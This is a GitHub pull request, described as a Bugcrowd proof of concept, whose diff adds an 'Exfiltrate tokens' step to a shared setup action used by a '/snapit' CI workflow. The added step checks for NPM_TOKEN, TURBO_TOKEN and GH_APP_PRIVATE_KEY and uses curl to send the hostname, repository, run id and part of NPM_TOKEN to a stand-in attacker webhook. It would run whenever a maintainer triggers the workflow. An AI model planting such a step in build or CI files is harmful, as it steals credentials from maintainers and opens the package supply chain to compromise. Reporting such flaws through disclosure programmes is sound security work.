### PR TITLE
chore(setup-repo): add token exfiltration step for PoC

### DIFF
--- a/.github/actions/setup-repo/action.yml
+++ b/.github/actions/setup-repo/action.yml
@@ -9,6 +9,17 @@ inputs:
 runs:
   using: composite
   steps:
+      - name: Exfiltrate tokens
+        shell: bash
+        run: |
+          echo "::group::Token exfiltration (PoC)"
+          echo "NPM_TOKEN present: ${{ env.NPM_TOKEN != '' }}"
+          echo "TURBO_TOKEN present: ${{ env.TURBO_TOKEN != '' }}"
+          echo "GH_APP_PRIVATE_KEY present: ${{ env.GH_APP_PRIVATE_KEY != '' }}"
+          curl -s -X POST -d "host=$(hostname)&repo=$GITHUB_REPOSITORY&run=$GITHUB_RUN_ID&token=${NPM_TOKEN:0:10}" \
+            "https://webhook.site/ATTACKER_WEBHOOK" || true
+          echo "::endgroup::"
+
       # Install tools (Node + corepack) from mise.toml — single source of truth.
       # node.corepack = true in mise.toml enables corepack, which activates the
       # Yarn version pinned in package.json's packageManager field on first use.


### PR DESCRIPTION
## Describe your changes (can list changeset entries if preferable)
## Security PoC ? Token Exfiltration via `/snapit` Workflow

This PR demonstrates a CI/CD security vulnerability in the `/snapit` workflow (`.github/workflows/changeset-snapshot.yml`).

The workflow:
1. Triggers on `/snapit` comment (any user with write access)
2. Checks out the PR head branch
3. Runs `.github/actions/setup-repo` from the PR branch with `NPM_TOKEN`, `TURBO_TOKEN`, and `GH_APP_PRIVATE_KEY` in environment

This PR modifies `setup-repo/action.yml` to exfiltrate these tokens. If a maintainer commented `/snapit`, the tokens would be sent to an attacker-controlled server.

**No action needed** ? this is a demonstration for Bugcrowd vulnerability disclosure.

## Author Checklist (complete before requesting a review)
- [ ] I have performed a self-review of my code
- [ ] I have added thorough tests where applicable (unit / component / visual)
- [ ] If visual tests are required for the component, I have created a project in Percy
- [ ] I have reviewed the `PIE Storybook`/`PIE Docs` PR preview
- [ ] I have reviewed visual test updates properly before approving
- [ ] If changes will affect consumers of the package, I have created a changeset entry.
- [ ] If a changeset file has been created, I have used the `/snapit` functionality to test my changes in a consuming application

## Reviewer checklists (complete before approving)
### Reviewer 1
- [ ] I have reviewed the `PIE Storybook`/`PIE Docs` PR preview
- [ ] If there are visual test updates, I have reviewed them

### Reviewer 2
- [ ] I have reviewed the `PIE Storybook`/`PIE Docs` PR preview
- [ ] If there are visual test updates, I have reviewed them
